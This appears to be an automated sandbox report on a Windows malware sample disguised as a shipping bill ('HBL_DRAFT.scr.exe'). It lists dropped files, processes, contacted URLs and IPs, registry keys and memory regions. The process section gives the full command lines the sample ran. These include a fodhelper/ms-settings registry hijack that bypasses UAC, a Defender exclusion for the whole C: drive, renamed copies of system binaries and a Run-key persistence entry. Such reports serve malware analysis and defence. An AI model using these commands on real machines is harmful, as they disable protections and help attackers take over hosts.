Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
initial sample
|
||
C:\Users\Public\Glzskrlg.url
|
MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Glzskrlg.PIF">), ASCII text, with CRLF line
terminators
|
dropped
|
||
C:\Users\Public\Libraries\Glzskrlg
|
data
|
dropped
|
||
C:\Users\Public\Libraries\Glzskrlg.PIF
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\Public\Libraries\glrkszlG.pif
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\18A2.tmp\18A3.tmp\18A4.bat
|
ASCII text, with very long lines (324), with CRLF line terminators
|
dropped
|
||
C:\Users\Public\Libraries\PNO
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\Public\alpha.exe
|
PE32+ executable (console) x86-64, for MS Windows
|
modified
|
||
C:\Users\Public\ger.exe
|
PE32+ executable (console) x86-64, for MS Windows
|
modified
|
||
C:\Users\Public\xkn.exe
|
PE32+ executable (console) x86-64, for MS Windows
|
modified
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\xkn.exe.log
|
CSV text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\json[1].json
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_inu0x2un.w4d.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ncfpuwjd.ueg.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\agyqwjporhwhb
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\bhv5415.tmp
|
Extensible storage engine DataBase, version 0x620, checksum 0x50f2d234, page size 32768, DirtyShutdown, Windows version 10.0
|
dropped
|
||
C:\Windows \System32\per.exe
|
PE32+ executable (GUI) x86-64, for MS Windows
|
modified
|
||
\Device\Null
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 9 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe
|
"C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe"
|
||
C:\Users\Public\Libraries\glrkszlG.pif
|
C:\Users\Public\Libraries\glrkszlG.pif
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\18A2.tmp\18A3.tmp\18A4.bat C:\Users\Public\Libraries\glrkszlG.pif"
|
||
C:\Windows\System32\extrac32.exe
|
C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
|
||
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
|
||
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
|
||
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
|
||
C:\Windows\System32\extrac32.exe
|
extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
|
||
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
|
||
C:\Windows\System32\extrac32.exe
|
extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
|
||
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
|
||
C:\Windows\System32\extrac32.exe
|
extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
|
||
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger
add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden
-Command "Add-MpPreference -ExclusionPath C:\"' ; "
|
||
C:\Users\Public\xkn.exe
|
C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command
/f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
|
||
C:\Users\Public\alpha.exe
|
"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ
/d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
|
||
C:\Users\Public\ger.exe
|
C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn
-WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
|
||
C:\Windows \System32\per.exe
|
"C:\\Windows \\System32\\per.exe"
|
||
C:\Windows\SysWOW64\extrac32.exe
|
C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe
C:\\Users\\Public\\Libraries\\Glzskrlg.PIF
|
||
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
|
||
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2
|
||
C:\Windows\System32\PING.EXE
|
ping 127.0.0.1 -n 2
|
||
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
|
||
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
|
||
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
|
||
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c del /q "C:\\Windows \\System32\\per.exe" / A / F / Q / S
|
||
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
|
||
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
|
||
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
|
||
C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe
|
C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe /stext "C:\Users\user\AppData\Local\Temp\agyqwjporhwhb"
|
||
C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe
|
C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe /stext "C:\Users\user\AppData\Local\Temp\cidbxbaqfqomdosx"
|
||
C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe
|
C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe /stext "C:\Users\user\AppData\Local\Temp\mcrtxutjtygzocojvhg"
|
||
C:\Users\Public\Libraries\Glzskrlg.PIF
|
"C:\Users\Public\Libraries\Glzskrlg.PIF"
|
||
C:\Users\Public\Libraries\Glzskrlg.PIF
|
"C:\Users\Public\Libraries\Glzskrlg.PIF"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\taskkill.exe
|
taskkill /F /IM SystemSettings.exe
|
||
C:\Windows\System32\SystemSettingsAdminFlows.exe
|
"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
|
There are 26 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
104.250.180.178
|
|||
https://onedrive.live.com/download?resid=7E01B4B465D32A9A%213365&authkey=
|
unknown
|
||
https://onedrive.live.com/download?resid=7E01B4B465D32A9A%213365&authkey=!AAwtw4clrUPD3Bw
|
13.107.139.11
|
||
http://geoplugin.net/json.gp&c2?
|
unknown
|
||
http://www.imvu.comr
|
unknown
|
||
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
|
unknown
|
||
http://ocsp.sectigo.com0
|
unknown
|
||
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=W
|
unknown
|
||
http://www.imvu.comta
|
unknown
|
||
https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbad
|
unknown
|
||
https://aefd.nelreports.net/api/report?cat=bingth
|
unknown
|
||
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
|
unknown
|
||
https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc
|
unknown
|
||
http://www.nirsoft.net
|
unknown
|
||
https://aefd.nelreports.net/api/report?cat=bingaotak
|
unknown
|
||
https://deff.nelreports.net/api/report?cat=msn
|
unknown
|
||
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Fr
|
unknown
|
||
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
|
unknown
|
||
https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742
|
unknown
|
||
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Fr
|
unknown
|
||
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
|
unknown
|
||
https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51
|
unknown
|
||
https://www.google.com
|
unknown
|
||
https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950c
|
unknown
|
||
http://geoplugin.net/json.gp/C
|
unknown
|
||
https://maps.windows.com/windows-app-web-link
|
unknown
|
||
https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
|
unknown
|
||
https://live.com/
|
unknown
|
||
https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8
|
unknown
|
||
https://login.yahoo.com/config/login
|
unknown
|
||
https://c6c4bq.db.files.1drv.com/y4mMjDna1hFKlb3gcMt7CCWqdkVpW0DS9Rs52USyRQhNgPBhPdYAV7L6hMIv9WCXM5X
|
unknown
|
||
http://geoplugin.net/json.gpV
|
unknown
|
||
http://www.nirsoft.net/
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816d
|
unknown
|
||
http://geoplugin.net/json.gp_
|
unknown
|
||
https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d
|
unknown
|
||
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
|
unknown
|
||
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
|
unknown
|
||
https://www.office.com/
|
unknown
|
||
https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8
|
unknown
|
||
https://sectigo.com/CPS0
|
unknown
|
||
https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68
|
unknown
|
||
https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2
|
unknown
|
||
https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d
|
unknown
|
||
http://geoplugin.net/json.gpj
|
unknown
|
||
https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437
|
unknown
|
||
https://c6c4bq.db.files.1drv.com/_wR;
|
unknown
|
||
http://www.imvu.com
|
unknown
|
||
https://aefd.nelreports.net/api/report?cat=wsb
|
unknown
|
||
https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326
|
unknown
|
||
https://c6c4bq.db.files.1drv.com/y4muza8-AaN89J3KOPjgz4xuHsRw8GpbmeCTYrNNV8GxQvY6QuZ4f4Rksz00DRpN4rZ
|
unknown
|
||
https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03
|
unknown
|
||
https://c6c4bq.db.files.1drv.com:443/y4mMjDna1hFKlb3gcMt7CCWqdkVpW0DS9Rs52USyRQhNgPBhPdYAV7L6hMIv9WC
|
unknown
|
||
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
https://aefd.nelreports.net/api/report?cat=bingaot
|
unknown
|
||
https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-ae
|
unknown
|
||
https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7
|
unknown
|
||
https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFD
|
unknown
|
||
https://live.com/d
|
unknown
|
||
https://aefd.nelreports.net/api/report?cat=bingrms
|
unknown
|
||
https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993
|
unknown
|
||
https://www.google.com/accounts/servicelogin
|
unknown
|
||
https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3
|
unknown
|
||
https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135
|
unknown
|
||
http://www.pmail.com
|
unknown
|
||
http://ocsp.sectigo.com0C
|
unknown
|
||
https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59
|
unknown
|
||
http://www.ebuddy.com
|
unknown
|
There are 61 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
onedrive.live.com
|
unknown
|
||
c6c4bq.db.files.1drv.com
|
unknown
|
||
dual-spov-0006.spov-msedge.net
|
13.107.139.11
|
||
geoplugin.net
|
178.237.33.50
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
104.250.180.178
|
unknown
|
United States
|
||
127.0.0.1
|
unknown
|
unknown
|
||
13.107.139.11
|
dual-spov-0006.spov-msedge.net
|
United States
|
||
178.237.33.50
|
geoplugin.net
|
Netherlands
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Glzskrlg
|
||
HKEY_CURRENT_USER\SOFTWARE\CorelDraw-OW5ET7
|
exepath
|
||
HKEY_CURRENT_USER\SOFTWARE\CorelDraw-OW5ET7
|
licence
|
||
HKEY_CURRENT_USER\SOFTWARE\CorelDraw-OW5ET7
|
time
|
||
HKEY_CURRENT_USER_Classes\ms-settings\shell\open\command
|
NULL
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
929000
|
heap
|
page read and write
|
||
7EC30000
|
direct allocation
|
page read and write
|
||
97D000
|
heap
|
page read and write
|
||
26E20000
|
direct allocation
|
page execute and read and write
|
||
796000
|
heap
|
page read and write
|
||
2A20000
|
direct allocation
|
page execute and read and write
|
||
78C000
|
heap
|
page read and write
|
||
22FE30A0000
|
heap
|
page read and write
|
||
28BE74B0000
|
heap
|
page read and write
|
||
19B5678000
|
stack
|
page read and write
|
||
7FF70CC70000
|
unkown
|
page readonly
|
||
7FF70CCCD000
|
unkown
|
page readonly
|
||
22A45B35000
|
heap
|
page read and write
|
||
62F000
|
heap
|
page read and write
|
||
2990D990000
|
heap
|
page read and write
|
||
7F6A0000
|
direct allocation
|
page read and write
|
||
935000
|
heap
|
page read and write
|
||
7FF70CCA2000
|
unkown
|
page readonly
|
||
27570000
|
heap
|
page read and write
|
||
2C476085000
|
heap
|
page read and write
|
||
769497F000
|
stack
|
page read and write
|
||
14171373000
|
heap
|
page read and write
|
||
7FDEC000
|
direct allocation
|
page read and write
|
||
23BBA9C0000
|
heap
|
page read and write
|
||
2692E000
|
stack
|
page read and write
|
||
1FEF10D6000
|
heap
|
page read and write
|
||
23BE14D000
|
stack
|
page read and write
|
||
7FF70CCBF000
|
unkown
|
page read and write
|
||
2990FEE0000
|
heap
|
page read and write
|
||
97D000
|
heap
|
page read and write
|
||
93C000
|
heap
|
page read and write
|
||
9B5000
|
heap
|
page read and write
|
||
9B000
|
stack
|
page read and write
|
||
27570000
|
heap
|
page read and write
|
||
963000
|
heap
|
page read and write
|
||
28F3000
|
direct allocation
|
page execute and read and write
|
||
7FF7E0A31000
|
unkown
|
page execute read
|
||
908E5FC000
|
stack
|
page read and write
|
||
908E3F6000
|
stack
|
page read and write
|
||
2675A000
|
stack
|
page read and write
|
||
7FF70CC70000
|
unkown
|
page readonly
|
||
7FF70CCBF000
|
unkown
|
page read and write
|
||
14171310000
|
heap
|
page read and write
|
||
2C23B320000
|
heap
|
page read and write
|
||
2762E000
|
stack
|
page read and write
|
||
7FF70CCCD000
|
unkown
|
page readonly
|
||
942000
|
heap
|
page read and write
|
||
7EEDF000
|
direct allocation
|
page read and write
|
||
265D3000
|
direct allocation
|
page read and write
|
||
21C513C7000
|
heap
|
page read and write
|
||
7EEE0000
|
direct allocation
|
page read and write
|
||
24E03BE0000
|
heap
|
page read and write
|
||
3C01A000
|
heap
|
page read and write
|
||
7FF70CCBF000
|
unkown
|
page read and write
|
||
7F532000
|
direct allocation
|
page read and write
|
||
1417138B000
|
heap
|
page read and write
|
||
7FF6FEF91000
|
unkown
|
page execute read
|
||
91F000
|
heap
|
page read and write
|
||
938000
|
heap
|
page read and write
|
||
91C000
|
heap
|
page read and write
|
||
947000
|
heap
|
page read and write
|
||
7FF70CCCD000
|
unkown
|
page readonly
|
||
277A3000
|
heap
|
page read and write
|
||
7EDF0000
|
direct allocation
|
page read and write
|
||
99F000
|
heap
|
page read and write
|
||
931000
|
heap
|
page read and write
|
||
1F4391A0000
|
heap
|
page read and write
|
||
7FF70CCB9000
|
unkown
|
page read and write
|
||
1E892260000
|
heap
|
page read and write
|
||
7FF70CCAD000
|
unkown
|
page write copy
|
||
1417138B000
|
heap
|
page read and write
|
||
8AE000
|
heap
|
page read and write
|
||
590000
|
heap
|
page read and write
|
||
1AC39D87000
|
heap
|
page read and write
|
||
40100000
|
direct allocation
|
page read and write
|
||
2751E000
|
heap
|
page read and write
|
||
1F0000
|
heap
|
page read and write
|
||
7FF70CC71000
|
unkown
|
page execute read
|
||
2990D9B3000
|
heap
|
page read and write
|
||
934000
|
heap
|
page read and write
|
||
263A000
|
direct allocation
|
page read and write
|
||
928000
|
heap
|
page read and write
|
||
7FF6996CD000
|
unkown
|
page readonly
|
||
3F7FC000
|
heap
|
page read and write
|
||
7F380000
|
direct allocation
|
page read and write
|
||
1F43AF49000
|
trusted library allocation
|
page read and write
|
||
2695F000
|
stack
|
page read and write
|
||
22FE30D5000
|
heap
|
page read and write
|
||
9B5000
|
heap
|
page read and write
|
||
94A000
|
heap
|
page read and write
|
||
1FEF10EC000
|
heap
|
page read and write
|
||
27088340000
|
heap
|
page read and write
|
||
3C230000
|
heap
|
page read and write
|
||
26A9E000
|
stack
|
page read and write
|
||
2383000
|
direct allocation
|
page read and write
|
||
217FF3A0000
|
trusted library allocation
|
page read and write
|
||
193000
|
stack
|
page read and write
|
||
938000
|
heap
|
page read and write
|
||
7FFD9BBA0000
|
trusted library allocation
|
page read and write
|
||
7FF70CCA2000
|
unkown
|
page readonly
|
||
7FF70CCAD000
|
unkown
|
page read and write
|
||
21C512C0000
|
heap
|
page read and write
|
||
8FB000
|
heap
|
page read and write
|
||
979000
|
heap
|
page read and write
|
||
2C475DA0000
|
heap
|
page read and write
|
||
1F43A9C0000
|
trusted library allocation
|
page read and write
|
||
7EF7A000
|
direct allocation
|
page read and write
|
||
22A45850000
|
heap
|
page read and write
|
||
274FD000
|
heap
|
page read and write
|
||
10DE85D0000
|
heap
|
page read and write
|
||
19B57FE000
|
stack
|
page read and write
|
||
456000
|
system
|
page execute and read and write
|
||
24FA000
|
direct allocation
|
page read and write
|
||
7FF70CCB1000
|
unkown
|
page read and write
|
||
584000
|
heap
|
page read and write
|
||
26E01300000
|
heap
|
page read and write
|
||
6F0000
|
direct allocation
|
page execute and read and write
|
||
2653A000
|
direct allocation
|
page read and write
|
||
2374000
|
direct allocation
|
page read and write
|
||
7F590000
|
direct allocation
|
page read and write
|
||
26E1F000
|
stack
|
page read and write
|
||
26FEE000
|
stack
|
page read and write
|
||
3CCACFC000
|
stack
|
page read and write
|
||
14171300000
|
heap
|
page read and write
|
||
19B587E000
|
stack
|
page read and write
|
||
7FFD9BC90000
|
trusted library allocation
|
page read and write
|
||
19B54FF000
|
stack
|
page read and write
|
||
217FD59F000
|
heap
|
page read and write
|
||
7FF70CCA2000
|
unkown
|
page readonly
|
||
1F439120000
|
heap
|
page read and write
|
||
7FF70CCB9000
|
unkown
|
page read and write
|
||
14155414000
|
heap
|
page read and write
|
||
7FFD9BAC0000
|
trusted library allocation
|
page execute and read and write
|
||
76949FF000
|
stack
|
page read and write
|
||
1F453110000
|
heap
|
page execute and read and write
|
||
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
22F6000
|
direct allocation
|
page read and write
|
||
2750E000
|
heap
|
page read and write
|
||
7EC10000
|
direct allocation
|
page read and write
|
||
700000
|
heap
|
page read and write
|
||
931000
|
heap
|
page read and write
|
||
7FF70CCAD000
|
unkown
|
page read and write
|
||
91C000
|
heap
|
page read and write
|
||
27088345000
|
heap
|
page read and write
|
||
7F440000
|
direct allocation
|
page read and write
|
||
166CFD00000
|
heap
|
page read and write
|
||
3FAEE000
|
heap
|
page read and write
|
||
7FF70CCC9000
|
unkown
|
page readonly
|
||
6B0000
|
heap
|
page read and write
|
||
1FEF10CF000
|
heap
|
page read and write
|
||
24E03B50000
|
heap
|
page read and write
|
||
1E892287000
|
heap
|
page read and write
|
||
A3F000
|
stack
|
page read and write
|
||
1AC39D6A000
|
heap
|
page read and write
|
||
217FEE60000
|
heap
|
page read and write
|
||
7FF70CCC9000
|
unkown
|
page readonly
|
||
24C0000
|
direct allocation
|
page read and write
|
||
2940000
|
trusted library allocation
|
page read and write
|
||
9D5000
|
heap
|
page read and write
|
||
7FF70CCCC000
|
unkown
|
page write copy
|
||
A40000
|
heap
|
page read and write
|
||
7FF7E0A40000
|
unkown
|
page readonly
|
||
7FF70CCA2000
|
unkown
|
page readonly
|
||
3DD7EFE000
|
stack
|
page read and write
|
||
7FFD9BB60000
|
trusted library allocation
|
page execute and read and write
|
||
A8DC17F000
|
stack
|
page read and write
|
||
908E27C000
|
stack
|
page read and write
|
||
27518000
|
heap
|
page read and write
|
||
7FF70CC70000
|
unkown
|
page readonly
|
||
1F43B05E000
|
trusted library allocation
|
page read and write
|
||
945000
|
heap
|
page read and write
|
||
7FF70CCCD000
|
unkown
|
page readonly
|
||
7FF7E0A84000
|
unkown
|
page readonly
|
||
1AC39D83000
|
heap
|
page read and write
|
||
1FEF3710000
|
heap
|
page read and write
|
||
908E57D000
|
stack
|
page read and write
|
||
2641000
|
heap
|
page read and write
|
||
7FF70CCC9000
|
unkown
|
page readonly
|
||
22FE2ED3000
|
heap
|
page read and write
|
||
6E0000
|
heap
|
page read and write
|
||
166CFDCA000
|
heap
|
page read and write
|
||
27571000
|
heap
|
page read and write
|
||
59E000
|
stack
|
page read and write
|
||
1FEF10EC000
|
heap
|
page read and write
|
||
22A45AE0000
|
heap
|
page read and write
|
||
5E3000
|
heap
|
page read and write
|
||
584000
|
heap
|
page read and write
|
||
3FAB2000
|
heap
|
page read and write
|
||
270880E4000
|
heap
|
page read and write
|
||
7FF70CCC9000
|
unkown
|
page readonly
|
||
7FF70CCC9000
|
unkown
|
page readonly
|
||
7FF70CC70000
|
unkown
|
page readonly
|
||
7FF70CC70000
|
unkown
|
page readonly
|
||
1BD753C0000
|
heap
|
page read and write
|
||
274F0000
|
heap
|
page read and write
|
||
416000
|
unkown
|
page readonly
|
||
217FD5BB000
|
heap
|
page read and write
|
||
624000
|
heap
|
page read and write
|
||
7FF70CCC9000
|
unkown
|
page readonly
|
||
7EEE0000
|
direct allocation
|
page read and write
|
||
2796B000
|
direct allocation
|
page execute and read and write
|
||
7FFD9BA5C000
|
trusted library allocation
|
page execute and read and write
|
||
19D000
|
stack
|
page read and write
|
||
938000
|
heap
|
page read and write
|
||
1F43B029000
|
trusted library allocation
|
page read and write
|
||
7FF70CCA2000
|
unkown
|
page readonly
|
||
265D8000
|
direct allocation
|
page read and write
|
||
2391000
|
direct allocation
|
page read and write
|
||
7FD58000
|
direct allocation
|
page read and write
|
||
3FB42000
|
heap
|
page read and write
|
||
1F453440000
|
heap
|
page read and write
|
||
3FAD1000
|
heap
|
page read and write
|
||
2750E000
|
heap
|
page read and write
|
||
4D0000
|
unkown
|
page readonly
|
||
7EDF0000
|
direct allocation
|
page read and write
|
||
2990D7F0000
|
heap
|
page read and write
|
||
1DFC9660000
|
heap
|
page read and write
|
||
98A000
|
heap
|
page read and write
|
||
9C0000
|
heap
|
page read and write
|
||
1F43AF95000
|
trusted library allocation
|
page read and write
|
||
26A2F000
|
stack
|
page read and write
|
||
27570000
|
heap
|
page read and write
|
||
7FF70CCAD000
|
unkown
|
page read and write
|
||
7FFD9BBB0000
|
trusted library allocation
|
page read and write
|
||
B2389CE000
|
stack
|
page read and write
|
||
26546FE000
|
stack
|
page read and write
|
||
7FF70CCA2000
|
unkown
|
page readonly
|
||
27570000
|
heap
|
page read and write
|
||
7F4D0000
|
direct allocation
|
page read and write
|
||
217FD4F0000
|
heap
|
page read and write
|
||
7FF70CCCC000
|
unkown
|
page write copy
|
||
4AA000
|
remote allocation
|
page execute and read and write
|
||
19B5579000
|
stack
|
page read and write
|
||
7F654000
|
direct allocation
|
page read and write
|
||
7FF70CC71000
|
unkown
|
page execute read
|
||
3321D0C000
|
stack
|
page read and write
|
||
7FF70CCC9000
|
unkown
|
page readonly
|
||
1F44AF10000
|
trusted library allocation
|
page read and write
|
||
921000
|
heap
|
page read and write
|
||
2990D826000
|
heap
|
page read and write
|
||
3FCE1000
|
heap
|
page read and write
|
||
1FEF1040000
|
heap
|
page read and write
|
||
7FF70CCC4000
|
unkown
|
page read and write
|
||
26D1E000
|
stack
|
page read and write
|
||
3CCADFF000
|
stack
|
page read and write
|
||
22A45790000
|
heap
|
page read and write
|
||
4B1000
|
remote allocation
|
page execute and read and write
|
||
708000
|
heap
|
page read and write
|
||
2C476080000
|
heap
|
page read and write
|
||
19B52FE000
|
stack
|
page read and write
|
||
7FFD9BCB0000
|
trusted library allocation
|
page read and write
|
||
279B1000
|
direct allocation
|
page execute and read and write
|
||
27570000
|
heap
|
page read and write
|
||
B2388CB000
|
stack
|
page read and write
|
||
22A458B9000
|
heap
|
page read and write
|
||
14173300000
|
trusted library allocation
|
page read and write
|
||
33221FF000
|
stack
|
page read and write
|
||
1F43A9A0000
|
trusted library allocation
|
page read and write
|
||
7FF70CCBF000
|
unkown
|
page read and write
|
||
700000
|
heap
|
page read and write
|
||
1F453023000
|
heap
|
page read and write
|
||
94A000
|
heap
|
page read and write
|
||
27571000
|
heap
|
page read and write
|
||
3BE75000
|
heap
|
page read and write
|
||
76945AB000
|
stack
|
page read and write
|
||
217FD4D0000
|
heap
|
page read and write
|
||
7EEDF000
|
direct allocation
|
page read and write
|
||
23BE4FF000
|
stack
|
page read and write
|
||
7FF70CC70000
|
unkown
|
page readonly
|
||
3FAF2000
|
heap
|
page read and write
|
||
2C23B605000
|
heap
|
page read and write
|
||
217FD5CD000
|
heap
|
